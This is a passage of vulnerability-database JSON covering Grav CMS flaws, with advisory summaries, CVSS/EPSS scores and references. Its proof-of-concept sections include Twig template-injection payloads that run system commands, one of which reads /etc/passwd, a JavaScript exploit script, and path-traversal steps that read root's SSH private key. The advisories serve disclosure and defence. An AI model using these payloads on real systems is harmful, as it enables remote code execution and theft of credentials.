UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5"},{"reference_url":"https://gi
thub.com/getgrav/grav/security/advisories/GHSA-96xv-rmwj-6p9w","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-12-18T19:02:44Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-96xv-rmwj-6p9w"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-34252","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-34252"},{"reference_url":"https://github.com/advisories/GHSA-96xv-rmwj-6p9w","reference_id":"GHSA-96xv-rmwj-6p9w","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-96xv-rmwj-6p9w"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/72011?format=json","purl":"pkg:composer/getgrav/grav@1.7.42","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-13tt-ebbj-eyg8"},{"vulnerability":"VCID-19e3-3agd-bbc8"},{"vulnerability":"VCID-1gzk-uead-q7ch"},{"vulnerability":"VCID-1kvz-tbnw-dyev"},{"vulnerability":"VCID-2fzp-f93m-afe3"},{"vulnerability":"VCID-31dk-jdqj-pfag"},{"vulnerability":"VCID-47rc-kqnw-7ue8"},{"vulnerability":"VCID-6gtj-f6gc-d3bf"},{"vulnerability":"VCID-91ht-8cax-7kdr"},{"vulnerability":"VCID-9h5a-h26f-cudw"},{"vulnerability":"VCID-9h65-8eka-quhd"},{"vulnerability":"VCID-bdnj-twfh-subp"},{"vulnerability":"VCID-bttg-w7fp-ybd2"},{"vulnerability":"VCID-dmbe-mmj8-3baa"},{"vulnerability":"VCID-dmh7-xvmg-27ef"},{"vulnerability":"VCID-dzhh-3xxa-1ycf"},{"vulnerabil
ity":"VCID-euf5-wt5v-fqaf"},{"vulnerability":"VCID-f8zy-fcfc-tfdc"},{"vulnerability":"VCID-fg9g-7eg3-7ygr"},{"vulnerability":"VCID-g8rq-2ss6-3kcu"},{"vulnerability":"VCID-gcpb-7cu7-q3as"},{"vulnerability":"VCID-hdsp-4e4r-c3fh"},{"vulnerability":"VCID-hwcx-1fp9-3bhh"},{"vulnerability":"VCID-ng3h-ees8-vubs"},{"vulnerability":"VCID-p24p-fcpe-xbah"},{"vulnerability":"VCID-rurt-s65k-1yfk"},{"vulnerability":"VCID-swcx-dmqn-2yf9"},{"vulnerability":"VCID-t3bt-hrw2-jya3"},{"vulnerability":"VCID-ugn8-e63y-1fes"},{"vulnerability":"VCID-v5ah-z3uv-fbet"},{"vulnerability":"VCID-vp4w-2f8d-vfcf"},{"vulnerability":"VCID-xe66-6nav-c7gy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.42"}],"aliases":["CVE-2023-34252","GHSA-96xv-rmwj-6p9w"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-q9c3-abt1-2kdf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/38779?format=json","vulnerability_id":"VCID-rs42-h8k4-zydz","summary":"Grav Server Side Template Injection (SSTI) vulnerability\n### Summary\nI found an RCE(Remote Code Execution) by SSTI in the admin screen.\n\n### Details\nRemote Code Execution is possible by embedding malicious PHP code on the administrator screen by a user with page editing privileges.\n\n### PoC\n1. Log in to the administrator screen and access the edit screen of the default page \"Typography\". (`http://127.0.0.1:8000/admin/pages/typography`)\n2. 
Open the browser's console screen and execute the following JavaScript code to confirm that an arbitrary command (`id`) is being executed.\n```js\n(async () => {\n  const nonce = document.querySelector(\"input[name=admin-nonce]\").value;\n  const id = document.querySelector(\"input[name=__unique_form_id__]\").value;\n\n  const payload = \"{{['id']|map('system')|join}}\"; // SSTI Payload\n\n  const params = new URLSearchParams();\n  params.append(\"task\", \"save\");\n  params.append(\"data[header][title]\", \"poc\");\n  params.append(\"data[content]\", payload);\n  params.append(\"data[folder]\", \"poc\");\n  params.append(\"data[route]\", \"\");\n  params.append(\"data[name]\", \"default\");\n  params.append(\"data[header][body_classes]\", \"\");\n  params.append(\"data[ordering]\", 1);\n  params.append(\"data[order]\", \"\");\n  params.append(\"toggleable_data[header][process]\", \"on\");\n  params.append(\"data[header][process][twig]\", 1);\n  params.append(\"data[header][order_by]\", \"\");\n  params.append(\"data[header][order_manual]\", \"\");\n  params.append(\"data[blueprint\", \"\");\n  params.append(\"data[lang]\", \"\");\n  params.append(\"_post_entries_save\", \"edit\");\n  params.append(\"__form-name__\", \"flex-pages\");\n  params.append(\"__unique_form_id__\", id);\n  params.append(\"admin-nonce\", nonce);\n\n  await fetch(\"http://127.0.0.1:8000/admin/pages/typography\", {\n    method: \"POST\",\n    headers: {\n      \"content-type\": \"application/x-www-form-urlencoded\",\n    },\n    body: params,\n  });\n\n  window.open(\"http://127.0.0.1:8000/admin/pages/poc/:preview\");\n})();\n```\n\n#### Execution Result\n- Payload: `{{['id']|map('system')|join}}`\n```sh\nuid=501(<user_name>) gid=20(staff) 
groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae) uid=501(<user_name>) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae)\n```\n- Payload: `{{['cat /etc/passwd']|map('system')|join}}`\n\n#### PoC 
Video\n- [PoC Video](https://drive.google.com/file/d/1wsmv7abdGc8WdYLNPPC5GrFcybhCORf2/view?usp=sharing)\n\n### Impact\nRemote Command Execution (RCE) is possible.\n\n### Occurrences\n- https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174\n\n### References\n- [PortSwigger: Server-side template injection](https://portswigger.net/web-security/server-side-template-injection)\n- [HackTricks: SSTI (Server Side Template Injection)](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#twig-php)","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-34251","reference_id":"","reference_type":"","scores":[{"value":"0.02554","scoring_system":"epss","scoring_elements":"0.85747","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-34251"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-27T16:52:48Z/"}],"url":"https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174"},{"reference_url":"https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d4
1e477177870b65ec","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec"},{"reference_url":"https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b"},{"reference_url":"https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8"},{"reference_url":"https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-27T16:52:48Z/"}],"url":"https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-f9jf-4cp4-4fq5","reference_id":"","reference_type":"","scores":[{"value":"10
","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-27T16:52:48Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-f9jf-4cp4-4fq5"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-34251","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-34251"},{"reference_url":"https://github.com/advisories/GHSA-f9jf-4cp4-4fq5","reference_id":"GHSA-f9jf-4cp4-4fq5","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-f9jf-4cp4-4fq5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/72011?format=json","purl":"pkg:composer/getgrav/grav@1.7.42","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-13tt-ebbj-eyg8"},{"vulnerability":"VCID-19e3-3agd-bbc8"},{"vulnerability":"VCID-1gzk-uead-q7ch"},{"vulnerability":"VCID-1kvz-tbnw-dyev"},{"vulnerability":"VCID-2fzp-f93m-afe3"},{"vulnerability":"VCID-31dk-jdqj-pfag"},{"vulnerability":"VCID-47rc-kqnw-7ue8"},{"vulnerability":"VCID-6gtj-f6gc-d3bf"},{"vulnerability":"VCID-91ht-8cax-7kdr"},{"vulnerability":"VCID-9h5a-h26f-cudw"},{"vulnerability":"VCID-9h65-8eka-quhd"},{"vulnerability":"VCID-bdnj-twfh-subp"},{"vulnerability":"VCID-bttg-w7fp-ybd2"},{"vulnerability":"VCID-dmbe-mmj8-3baa"},{"vulnerability":"VCID-dmh7-xvmg-27ef"},{"vulnerability":"VCID-dzhh-3xxa-1ycf"},{"vulnerability":"VCID-euf5-wt5v-fqaf"},{"vulnerability":"VCID-f8zy-fcfc-tfdc"},{"vulnerability":"VCID-fg9g-7eg3-7ygr"},{"vulner
ability":"VCID-g8rq-2ss6-3kcu"},{"vulnerability":"VCID-gcpb-7cu7-q3as"},{"vulnerability":"VCID-hdsp-4e4r-c3fh"},{"vulnerability":"VCID-hwcx-1fp9-3bhh"},{"vulnerability":"VCID-ng3h-ees8-vubs"},{"vulnerability":"VCID-p24p-fcpe-xbah"},{"vulnerability":"VCID-rurt-s65k-1yfk"},{"vulnerability":"VCID-swcx-dmqn-2yf9"},{"vulnerability":"VCID-t3bt-hrw2-jya3"},{"vulnerability":"VCID-ugn8-e63y-1fes"},{"vulnerability":"VCID-v5ah-z3uv-fbet"},{"vulnerability":"VCID-vp4w-2f8d-vfcf"},{"vulnerability":"VCID-xe66-6nav-c7gy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.42"}],"aliases":["CVE-2023-34251","GHSA-f9jf-4cp4-4fq5"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-rs42-h8k4-zydz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/11471?format=json","vulnerability_id":"VCID-rurt-s65k-1yfk","summary":"Server Side Template Injection (SSTI) via Twig escape handler\n### Summary\nDue to the unrestricted access to twig extension class from grav context, an attacker can redefine the escape function and execute arbitrary commands.\n\n### Details\nhttps://github.com/twigphp/Twig/blob/3.x/src/Extension/EscaperExtension.php#L99\n```php\n/**\n     * Defines a new escaper to be used via the escape filter.\n     *\n     * @param string   $strategy The strategy name that should be used as a strategy in the escape call\n     * @param callable $callable A valid PHP callable\n     */\n    public function setEscaper($strategy, callable $callable)\n    {\n        $this->escapers[$strategy] = $callable;\n    }\n ```\n Twig supports the functionality to redefine the escape function through the setEscaper method. 
\nHowever, that method is not originally exposed to the twig environment, but it is accessible through the payload below.\n\n```plaintext\n{{ grav.twig.twig.extensions.core.setEscaper('a','a') }}\n```\nAt this point, it accepts callable type as an argument, but as there is no validation for the $callable variable, attackers can set dangerous functions like system as the escaper function.\n\n\n### PoC\n```\n{{ var_dump(grav.twig.twig.extensions.core.setEscaper('system','twig_array_filter')) }}\n{{ var_dump(['id'] | escape('system', 'system')) }}\n```\n\n### Impact\nTwig processing of static pages can be enabled in the front matter by any administrative user allowed to create or edit pages.\nAs the Twig processor runs unsandboxed, this behavior can be used to gain arbitrary code execution and elevate privileges on the instance.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-28119","reference_id":"","reference_type":"","scores":[{"value":"0.01406","scoring_system":"epss","scoring_elements":"0.80779","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-28119"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/de1ccfa12dbcbf526104d68c1a6bc202a98698fe","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-03-28T18:13:10Z/"}],"url":"https://github.com/getgrav/grav/commit/de1ccfa12dbcbf526104d68c1a6
bc202a98698fe"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-03-28T18:13:10Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58"},{"reference_url":"https://github.com/twigphp/Twig/blob/3.x/src/Extension/EscaperExtension.php#L99","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-03-28T18:13:10Z/"}],"url":"https://github.com/twigphp/Twig/blob/3.x/src/Extension/EscaperExtension.php#L99"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-28119","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-28119"},{"reference_url":"https://github.com/advisories/GHSA-2m7x-c7px-hp58","reference_id":"GHSA-2m7x-c7px-hp58","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2m7x-c7px-hp58"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/33336?format=json","purl":"pkg:composer/getgrav/grav@1.7.45","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-19e3-3agd-bbc8
"},{"vulnerability":"VCID-1gzk-uead-q7ch"},{"vulnerability":"VCID-1kvz-tbnw-dyev"},{"vulnerability":"VCID-2fzp-f93m-afe3"},{"vulnerability":"VCID-31dk-jdqj-pfag"},{"vulnerability":"VCID-6gtj-f6gc-d3bf"},{"vulnerability":"VCID-91ht-8cax-7kdr"},{"vulnerability":"VCID-9h65-8eka-quhd"},{"vulnerability":"VCID-bdnj-twfh-subp"},{"vulnerability":"VCID-bttg-w7fp-ybd2"},{"vulnerability":"VCID-dmbe-mmj8-3baa"},{"vulnerability":"VCID-dmh7-xvmg-27ef"},{"vulnerability":"VCID-dzhh-3xxa-1ycf"},{"vulnerability":"VCID-euf5-wt5v-fqaf"},{"vulnerability":"VCID-f8zy-fcfc-tfdc"},{"vulnerability":"VCID-fg9g-7eg3-7ygr"},{"vulnerability":"VCID-gcpb-7cu7-q3as"},{"vulnerability":"VCID-hwcx-1fp9-3bhh"},{"vulnerability":"VCID-ng3h-ees8-vubs"},{"vulnerability":"VCID-swcx-dmqn-2yf9"},{"vulnerability":"VCID-t3bt-hrw2-jya3"},{"vulnerability":"VCID-ugn8-e63y-1fes"},{"vulnerability":"VCID-vp4w-2f8d-vfcf"},{"vulnerability":"VCID-xe66-6nav-c7gy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.45"}],"aliases":["CVE-2024-28119","GHSA-2m7x-c7px-hp58"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-rurt-s65k-1yfk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/30087?format=json","vulnerability_id":"VCID-swcx-dmqn-2yf9","summary":"Grav vulnerable to Path Traversal allowing server files backup\n### Summary\n```\nA path traversal vulnerability has been identified in Grav CMS, versions 1.7.49.5 , allowing authenticated attackers\n with administrative privileges to read arbitrary files on the underlying server filesystem. This vulnerability arises due\n to insufficient input sanitization in the backup tool, where user-supplied paths are not properly restricted, enabling\n access to files outside the intended webroot directory. 
The impact of this vulnerability depends on the privileges of \nthe user account running the application.\n```\n\n### PoC\n```\nTo accurately demonstrate the maximum potential impact of this vulnerability, the testing environment was configured in a specific way:\n\n- Elevated Privileges: The application was run locally with the highest possible system privileges, operating under the **`root`** user account.\n    \n- Objective: This configuration was chosen to unequivocally show that the path traversal vulnerability is not just a theoretical issue but can lead to a complete compromise of the underlying host when combined with poor operational practices. The ability to read any file on the system is the ultimate test of the flaw's severity.\n    \n\nProof of Concept Goal: Under these conditions, the subsequent PoC will exploit the vulnerability to read the SSH private key\n of the `root` user (`/root/.ssh/id_rsa`). The successful exfiltration of this key represents a worst-case scenario, as it would provide \nan attacker with persistent, undetectable, and complete administrative access to the host server. 
This highlights the critical intersection\n of an application-layer vulnerability and an infrastructure-level misconfiguration.\n\n```\n\n\n\n\n```\n1- LOGIN AS ADMIN AND  GO TO  : http://127.0.0.1/admin/tools/backups\n2- Change 'Root Folder' to backup directory /../../../../../../../root/.ssh/ \n\n```\n<img width=\"1902\" height=\"492\" alt=\"Screenshot 2025-09-11 161519\" src=\"https://github.com/user-attachments/assets/23a60dc3-7758-4e24-b910-e66a1dd1f5e2\" />\n\n\n\n```\n3- CLICK  : 'SAVE'\n4- CLICK  : 'Backup Now'\n```\n\n<img width=\"1916\" height=\"512\" alt=\"Screenshot 2025-09-11 154151\" src=\"https://github.com/user-attachments/assets/88a63ff2-777e-467e-857b-0644ef698499\" />\n\n```\n5- Extract Backup :\n```\n\n\n<img width=\"704\" height=\"101\" alt=\"Screenshot 2025-09-11 160114\" src=\"https://github.com/user-attachments/assets/b91ce4db-9843-4280-b8f0-32c73aa12d4d\" />\n<img width=\"567\" height=\"101\" alt=\"Screenshot 2025-09-11 160135\" src=\"https://github.com/user-attachments/assets/155ce7d8-c2fc-4b54-b054-f7c7550bec82\" 
/>","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66302","reference_id":"","reference_type":"","scores":[{"value":"0.00064","scoring_system":"epss","scoring_elements":"0.20137","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-66302"},{"reference_url":"https://github.com/getgrav/grav","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/getgrav/grav"},{"reference_url":"https://github.com/getgrav/grav/commit/ed640a13143c4177af013cf001969ed2c5e197ee","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-03T15:11:05Z/"}],"url":"https://github.com/getgrav/grav/commit/ed640a13143c4177af013cf001969ed2c5e197ee"},{"reference_url":"https://github.com/getgrav/grav/security/advisories/GHSA-j422-qmxp-hv94","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-03T15:11:05Z/"}],"url":"https://github.com/getgrav/grav/security/advisories/GHSA-j422-qmxp-hv94"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66302","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:
C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-66302"},{"reference_url":"https://github.com/advisories/GHSA-j422-qmxp-hv94","reference_id":"GHSA-j422-qmxp-hv94","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-j422-qmxp-hv94"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63161?format=json","purl":"pkg:composer/getgrav/grav@1.8.0-beta.27","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2fzp-f93m-afe3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"}],"aliases":["CVE-2025-66302","GHSA-j422-qmxp-hv94"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-swcx-dmqn-2yf9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/29801?format=json","vulnerability_id":"VCID-t3bt-hrw2-jya3","summary":"Grav is Vulnerable to Security Sandbox Bypass with SSTI (Server Side Template Injection)\n## Summary\n\nGrav CMS is vulnerable to a Server-Side Template Injection (SSTI) that allows any authenticated user with editor permissions to execute arbitrary code on the remote server, bypassing the existing security sandbox.\n\n## Details\n\nGrav CMS uses a custom sandbox to protect the powerful Twig methods such as `registerUndefinedFilterCallback()`. These methods are designed to prevent SSTI attacks by denying the execution of dangerous PHP functions (e.g., `exec()`, `passthru()`, `system()`, etc.) 
within Twig template directives.\n\nThe current defense mechanism relies on a blacklist of prohibited functions (PHP, Twig), checked through the `isDangerousFunction()` method in the file `system/src/Grav/Common/Twig.php`:\n\n```php\n$this->twig->registerUndefinedFilterCallback(function (string $name) use ($config) {\n    $allowed = $config->get('system.twig.safe_filters');\n    if (is_array($allowed) && in_array($name, $allowed, true) && function_exists($name)) {\n        return new TwigFilter($name, $name);\n    }\n    if ($config->get('system.twig.undefined_filters')) {\n        if (function_exists($name)) {\n            if (!Utils::isDangerousFunction($name)) {\n                user_error(\"PHP function {$name}() used as Twig filter. This is deprecated in Grav 1.7. Please add it to system configuration: `system.twig.safe_filters`\", E_USER_DEPRECATED);\n\n                return new TwigFilter($name, $name);\n            }\n\n            /** @var Debugger $debugger */\n            $debugger = $this->grav['debugger'];\n            $debugger->addException(new RuntimeException(\"Blocked potentially dangerous PHP function {$name}() being used as Twig filter. If you really want to use it, please add it to system configuration: `system.twig.safe_filters`\"));\n        }\n\n        return new TwigFilter($name, static function () {});\n    }\n\n    return false;\n});\n```\n\nIn this code, the `isDangerousFunction()` check is bypassed if the filter defined in the $name variable is considered safe. 
Only an administrator can mark a function as safe by adding it to the `system.twig.safe_filters` configuration properties (whitelists that are empty by default) in the `system/config/system.yaml` file.\n\nNotably, the Twig class is defined within the `system/src/Grav/Common/Twig.php` file, and the Twig object (and environment) is instantiated there:\n\n```php\n/**\n * Class Twig\n * @package Grav\\Common\\Twig\n */\nclass Twig\n{\n    /** @var Environment */\n    public $twig;\n    /** @var array */\n    public $twig_vars = [];\n    /** @var array */\n    public $twig_paths;\n    /** @var string */\n    public $template;\n\n    // Constructor\n    public function __construct(Grav $grav)\n    {\n        $this->grav = $grav;\n        $this->twig_paths = [];\n    }\n\n    // Twig initialization method\n    public function init()\n    {\n        if (null === $this->twig) {\n            /** @var Config $config */\n            $config = $this->grav['config'];\n            /** @var UniformResourceLocator $locator */\n            $locator = $this->grav['locator'];\n            /** @var Language $language */\n            $language = $this->grav['language'];\n\n            $active_language = $language->getActive();\n        ...\n        }\n    }\n}\n```\n\nSince the security sandbox does not fully protect the Twig object, it is possible to interact with it (e.g., call methods, read/write attributes) through maliciously crafted Twig template directives injected into a web page. 
